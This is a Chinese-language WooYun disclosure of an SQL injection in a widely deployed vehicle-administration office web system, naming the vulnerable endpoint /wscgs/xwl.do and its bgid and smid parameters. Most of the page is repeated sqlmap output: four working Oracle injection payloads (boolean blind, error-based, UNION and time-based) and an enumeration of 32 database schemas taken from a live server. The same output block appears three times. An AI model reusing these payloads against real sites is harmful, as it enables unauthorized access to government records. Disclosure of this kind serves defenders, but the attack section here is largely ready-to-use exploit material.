车管所系统通用SQL注入（影响大量车管所网站）

发表于 2014年12月25日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2014-088330

漏洞标题：车管所系统通用SQL注入（影响大量车管所网站）

相关厂商：山东国安信息产业有限责任公司

漏洞作者：路人甲

提交时间：2014-12-25 20:28

公开时间：2015-03-23 20:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：

漏洞详情

披露状态：

2014-12-25: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认，细节仅向厂商公开
2014-12-29: 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2015-02-19: 细节向核心白帽子及相关领域专家公开
2015-03-01: 细节向普通白帽子公开
2015-03-11: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述：

详细说明：

看案例如下：**.**.**.**:9080/wscgs/xwl.do**.**.**.**:9080/wscgs/xwl.dohttp://**.**.**.**:9080/wscgs/xwl.dohttp://**.**.**.**/wscgs/xwl.do**.**.**.**:9080/wscgs/xwl.do**.**.**.**:9080/wscgs/xwl.dohttp://**.**.**.**:9080/wscgs/xwl.do**.**.**.**/wscgs/xwl.doPOST参数:type=cxlist_fl&bgid=08&smid=123456存在注入参数:bgid= smid= 两处。1.测试bgid=参数注入:**.**.**.**/wscgs/xwl.doPOST参数:type=cxlist_fl&bgid=08&smid=123456

sqlmap identified the following injection points with a total of 0 HTTP(s) reque<br>
sts:<br>
---<br>
Place: POST<br>
Parameter: bgid<br>
    Type: boolean-based blind<br>
    Title: Oracle boolean-based blind - Parameter replace (original value)<br>
    Payload: type=cxlist_fl&bgid=(SELECT (CASE WHEN (7462=7462) THEN 08 ELSE CAS<br>
T(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)&smid=123456Type: error-based<br>
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)<br>
    Payload: type=cxlist_fl&bgid=08 AND 1348=(SELECT UPPER(XMLType(CHR(60)||CHR(<br>
58)||CHR(113)||CHR(102)||CHR(103)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (1348=<br>
1348) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(108)||CHR(116)||CHR<br>
(113)||CHR(62))) FROM DUAL)&smid=123456Type: UNION query<br>
    Title: Generic UNION query (NULL) - 1 column<br>
    Payload: type=cxlist_fl&bgid=-3628 UNION ALL SELECT CHR(113)||CHR(102)||CHR(<br>
103)||CHR(116)||CHR(113)||CHR(80)||CHR(97)||CHR(66)||CHR(68)||CHR(69)||CHR(120)|<br>
|CHR(115)||CHR(86)||CHR(89)||CHR(84)||CHR(113)||CHR(105)||CHR(108)||CHR(116)||CH<br>
R(113) FROM DUAL-- &smid=123456Type: AND/OR time-based blind<br>
    Title: Oracle AND time-based blind<br>
    Payload: type=cxlist_fl&bgid=08 AND 8328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)|<br>
|CHR(107)||CHR(67)||CHR(66),5)&smid=123456<br>
---<br>
[19:12:26] [INFO] the back-end DBMS is Oracle<br>
web application technology: JSP<br>
back-end DBMS: Oracle<br>
[19:12:26] [WARNING] schema names are going to be used on Oracle for enumeration<br>
 as the counterpart to database names on other DBMSes<br>
[19:12:26] [INFO] fetching database (schema) names<br>
[19:12:26] [INFO] the SQL query used returns 32 entries<br>
available databases [32]:<br>
[*] CTXSYS<br>
[*] DBSNMP<br>
[*] DMSYS<br>
[*] DRV_ADMIN<br>
[*] DRV_HEALTH<br>
[*] EXFSYS<br>
[*] GXHPJINING_USER<br>
[*] HPGL_USER<br>
[*] HR<br>
[*] IX<br>
[*] MDSYS<br>
[*] OE<br>
[*] OLAPSYS<br>
[*] ORDSYS<br>
[*] OUTLN<br>
[*] PM<br>
[*] QDMFXX_USER<br>
[*] QSWEBCGS_USER<br>
[*] SCOTT<br>
[*] SH<br>
[*] SYS<br>
[*] SYSMAN<br>
[*] SYSTEM<br>
[*] VEH_ADMIN<br>
[*] VIO_ADMIN<br>
[*] WK_TEST<br>
[*] WKSYS<br>
[*] WMS_USER<br>
[*] WMSYS<br>
[*] WSCGS<br>
[*] WWW<br>
[*] XDB[19:12:26] [INFO] fetched data logged to text files under 'C:\Documents and Sett<br>
ings\Administrator\.sqlmap\output\**.**.**.**'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: POST

Parameter: bgid

Type: boolean-based blind

Title: Oracle boolean-based blind - Parameter replace (original value)

Payload: type=cxlist_fl&bgid=(SELECT (CASE WHEN (7462=7462) THEN 08 ELSE CAS

T(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)&smid=123456Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: type=cxlist_fl&bgid=08 AND 1348=(SELECT UPPER(XMLType(CHR(60)||CHR(

58)||CHR(113)||CHR(102)||CHR(103)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (1348=

1348) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(108)||CHR(116)||CHR

(113)||CHR(62))) FROM DUAL)&smid=123456Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: type=cxlist_fl&bgid=-3628 UNION ALL SELECT CHR(113)||CHR(102)||CHR(

103)||CHR(116)||CHR(113)||CHR(80)||CHR(97)||CHR(66)||CHR(68)||CHR(69)||CHR(120)|

|CHR(115)||CHR(86)||CHR(89)||CHR(84)||CHR(113)||CHR(105)||CHR(108)||CHR(116)||CH

R(113) FROM DUAL-- &smid=123456Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: type=cxlist_fl&bgid=08 AND 8328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)|

|CHR(107)||CHR(67)||CHR(66),5)&smid=123456

---

[19:12:26] [INFO] the back-end DBMS is Oracle

web application technology: JSP

back-end DBMS: Oracle

[19:12:26] [WARNING] schema names are going to be used on Oracle for enumeration

as the counterpart to database names on other DBMSes

[19:12:26] [INFO] fetching database (schema) names

[19:12:26] [INFO] the SQL query used returns 32 entries

available databases [32]:

[*] CTXSYS

[*] DBSNMP

[*] DMSYS

[*] DRV_ADMIN

[*] DRV_HEALTH

[*] EXFSYS

[*] GXHPJINING_USER

[*] HPGL_USER

[*] HR

[*] IX

[*] MDSYS

[*] OE

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] PM

[*] QDMFXX_USER

[*] QSWEBCGS_USER

[*] SCOTT

[*] SH

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] VEH_ADMIN

[*] VIO_ADMIN

[*] WK_TEST

[*] WKSYS

[*] WMS_USER

[*] WMSYS

[*] WSCGS

[*] WWW

[*] XDB[19:12:26] [INFO] fetched data logged to text files under 'C:\Documents and Sett

ings\Administrator\.sqlmap\output\**.**.**.**'

2.测试注入参数smid=：http://**.**.**.**:9080/wscgs/xwl.doPOST参数：type=cxlist_fl&bgid=08&smid=123456

漏洞证明：

1.测试bgid=参数注入:**.**.**.**/wscgs/xwl.doPOST参数:type=cxlist_fl&bgid=08&smid=123456

sqlmap identified the following injection points with a total of 0 HTTP(s) reque<br>
sts:<br>
---<br>
Place: POST<br>
Parameter: bgid<br>
    Type: boolean-based blind<br>
    Title: Oracle boolean-based blind - Parameter replace (original value)<br>
    Payload: type=cxlist_fl&bgid=(SELECT (CASE WHEN (7462=7462) THEN 08 ELSE CAS<br>
T(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)&smid=123456Type: error-based<br>
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)<br>
    Payload: type=cxlist_fl&bgid=08 AND 1348=(SELECT UPPER(XMLType(CHR(60)||CHR(<br>
58)||CHR(113)||CHR(102)||CHR(103)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (1348=<br>
1348) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(108)||CHR(116)||CHR<br>
(113)||CHR(62))) FROM DUAL)&smid=123456Type: UNION query<br>
    Title: Generic UNION query (NULL) - 1 column<br>
    Payload: type=cxlist_fl&bgid=-3628 UNION ALL SELECT CHR(113)||CHR(102)||CHR(<br>
103)||CHR(116)||CHR(113)||CHR(80)||CHR(97)||CHR(66)||CHR(68)||CHR(69)||CHR(120)|<br>
|CHR(115)||CHR(86)||CHR(89)||CHR(84)||CHR(113)||CHR(105)||CHR(108)||CHR(116)||CH<br>
R(113) FROM DUAL-- &smid=123456Type: AND/OR time-based blind<br>
    Title: Oracle AND time-based blind<br>
    Payload: type=cxlist_fl&bgid=08 AND 8328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)|<br>
|CHR(107)||CHR(67)||CHR(66),5)&smid=123456<br>
---<br>
[19:12:26] [INFO] the back-end DBMS is Oracle<br>
web application technology: JSP<br>
back-end DBMS: Oracle<br>
[19:12:26] [WARNING] schema names are going to be used on Oracle for enumeration<br>
 as the counterpart to database names on other DBMSes<br>
[19:12:26] [INFO] fetching database (schema) names<br>
[19:12:26] [INFO] the SQL query used returns 32 entries<br>
available databases [32]:<br>
[*] CTXSYS<br>
[*] DBSNMP<br>
[*] DMSYS<br>
[*] DRV_ADMIN<br>
[*] DRV_HEALTH<br>
[*] EXFSYS<br>
[*] GXHPJINING_USER<br>
[*] HPGL_USER<br>
[*] HR<br>
[*] IX<br>
[*] MDSYS<br>
[*] OE<br>
[*] OLAPSYS<br>
[*] ORDSYS<br>
[*] OUTLN<br>
[*] PM<br>
[*] QDMFXX_USER<br>
[*] QSWEBCGS_USER<br>
[*] SCOTT<br>
[*] SH<br>
[*] SYS<br>
[*] SYSMAN<br>
[*] SYSTEM<br>
[*] VEH_ADMIN<br>
[*] VIO_ADMIN<br>
[*] WK_TEST<br>
[*] WKSYS<br>
[*] WMS_USER<br>
[*] WMSYS<br>
[*] WSCGS<br>
[*] WWW<br>
[*] XDB[19:12:26] [INFO] fetched data logged to text files under 'C:\Documents and Sett<br>
ings\Administrator\.sqlmap\output\**.**.**.**'